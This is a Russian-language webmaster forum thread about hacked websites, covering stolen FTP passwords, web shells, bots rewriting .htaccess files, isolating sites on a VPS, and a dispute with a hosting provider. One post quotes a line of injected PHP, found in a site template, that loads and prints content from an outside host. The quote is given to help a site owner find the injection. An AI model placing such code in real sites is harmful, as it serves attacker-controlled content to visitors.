Ну так вывод же очевиден, смотрите:
1. Чудес не бывает.
2. Сайт ломают.
3. Программист ничего найти не может.
Из этого следует что? Правильно, то, что ваш программист на это не способен. Вот и все пироги.
Уже сколько раз приходилось сталкиваться с подобным, когда обращаются с такими проблемами и рассказывают, что программисты или даже целая команда сто раз всё проверили и ничего не нашли, а потом смотришь и видишь шелл прямо на виду, в корне сайта. Детский сад, честное слово.
Если программист действительно штатный, то его рабочий день стоит примерно столько же, сколько стоит нанять спеца, который за несколько часов решит вашу проблему раз и навсегда.
Или покажите своему программисту закреплённый топик, глядишь и поможет, хотя я очень в этом сомневаюсь.
Нет, там товарищ серьёзный, винда и каспер лицензионнные у него стоят, хотя кто знает, что у него там ещё за софт имеется.
Но вообще косяк у него походу в java, так как древняя очень и он не обновлял её никогда. Я же думаю никто не забыл, как примерно годик назад сайты массово загаживали по фтп? Вот и сейчас мне снова стали такие частенько попадаться. И каждый раз когда я вижу, что сайт приговорили именно по фтп - спрашиваю, стоит ли java. И в 100% случаев ответ утвердительный, и всегда она древняя у них стоит.
Знаю я что соль расшифровать нереально, знаю я, что "говорит" - это не значит, что так оно и есть. Но чего-то всё равно я к мнению LEOnidUKG больше склоняюсь, что никакой. :)
Если загажен сам комп, то вряд ли какой то фтп-клиент будет безопасным, да и что мешает прямо с этого компа всё сделать, когда хозяин сам уже вошёл по фтп? Тут даже и пароли не нужны.
Так в том то и фишка, что тотал у него с мастерпаролем (во всяком случае, он так утверждает) и каспер стоит.
Но факт остаётся фактом, пароли дёрнули, так как сбрутить одновременно несколько разных акков не могли. :)
Хотя может и не договаривает чего, кто его знает, или вирь у него экзотический какой.
У меня вообще недавно случай был: почистил человеку сайт, даю пароль только от админки, он входит в админку и опа - сайт опять загажен. Сайт на джумле, дописано всё в index.php шаблона, через редактор, что в админке. Смотрю в логи - вход только с его IP, но действия в админке шустрые очень, видно что не человек работал. Больше вообще никого не было. Снова чищу, меняю пасс, даю ему - снова та же история. Заставил чистить комп. Говорит нашёл не мало. И после этого всё прекратилось.
После того случая я уже вообще ничему не удивляюсь :)
Не факт. Сегодня был клиент, который использовал его, хранил пароли в нём, но всё равно фтп-шные пароли дёрнули и загадили сайты на разных хостингах. :)
Ну вот и при чём здесь хостер? На любой из сайтов залит шелл, к которому периодически обращается бот и перезаписывает htaccess-ы.
А вот об этом нужно раньше было думать. Ибо нефиг держать все яйца в одной корзине. Взломали один - загадили все. Теперь конечно проблематично.
Кучи сайтов нужно не на хостингах держать в одном аккаунте, а VPS или даже дедик использовать. И каждый сайт отдельному юзеру ставить, чтобы изолированы они были друг от друга. И тогда таких проблем не будет, если и взломают какой то сайт - то загадят только его, а не все. А разобраться с одним сайтов в 50 раз легче чем с пятьюдесятью, не так ли? :)
Так может без вас кто-то "потрогал", само по себе редко что-то случается. :)
nok123, последний раз, когда я встречал сайт с подобным вердиктом от Яндекса, код выглядел вот так:
<?php$urlpurs="http://montraf.ru/8308/take.html";$beecode=@file_get_contents ($urlpurs);echo "$beecode";?>
Где точно находился не помню, вроде в хедере шаблона, однако далеко не факт, что у вас он будет выглядеть точно так же.
Но вообще вас правильно все послали в прикреплённый топик. Найдёте вы код, удалите, дальше что? Через неделю ведь снова появится, если причину взлома не устраните.
Спасибо, хоть это как бы уже и не актуально, так как клиент всё равно уже съехал на VDS, но если есть желание - посмотрите, ведь так быть не должно :)
Адрес сайта отправлю в личку.
porutchik, хотелось бы, вам задать вопрос из примерно той же области, вот просвятите меня пожалуйста.
Примерно неделю назад пишет мне ваш клиент просит помощи, говорит сайт его атакуют. Говорит не открывается ни у кого, а ваша поддержка говорит, якобы запросов к сайту очень много.
Посмотрел. Оказалось:
Сайт у человека на wordpress. На главной много картинок, которые генерируются через timthumb.php. Когда любой пользователь заходит на сайт - естественно, сколько картинок на главной, столько и одновременных подключений к этому файлу. И в результате сайт грузится только на половину и IP посетителя сайта улетает в Бан. Причём баните именно вы и надолго.
Как пояснил клиент - до этого дня всё нормально работало и тариф был не из дешёвых. Ваша поддержка погнала его на впс, куда собственно он и съехал. Там всё работает прекрасно и никто не атакует 😂
Поясните, зачем вы баните посетителей сайта, если на сайте много картинок? Такое я видел только у вас. Другие провайдеры если и ставят ограничения на количество одновременных подключений, то в таких случаях бы у них "лишние" картинки просто бы ошибку выдавали. А у вас же бан по IP. Может всё же действительно это такой хитрый ход, для того, чтобы всучить клиенту именно впс?
Ещё, как вариант, админку брутят 😂
И опять же, что там в логах? :)
Не думаете же вы, что у вас css\js mysql грузят 😂
